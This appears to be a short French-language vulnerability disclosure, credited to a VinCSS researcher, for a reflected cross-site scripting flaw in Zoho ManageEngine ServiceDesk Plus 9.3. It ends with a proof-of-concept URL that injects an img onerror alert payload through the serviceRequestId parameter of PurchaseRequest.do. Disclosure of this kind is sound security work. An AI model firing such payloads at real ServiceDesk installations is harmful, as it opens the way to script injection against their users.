
Exploit XSS de preuve de concept pour Zoho ManageEngine ServiceDesk Plus 9.3 via le paramètre serviceRequestId de PurchaseRequest.do, démontrant une vulnérabilité de cross-site scripting reflété.
Description de l'information : Un problème a été découvert dans Zoho ManageEngine ServiceDesk Plus 9.3. Il y a une vulnérabilité XSS via le paramètre serviceRequestId de PurchaseRequest.do.
Auteur : Concobe de Tarantula Team - VinCSS (membre de Vingroup)
domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1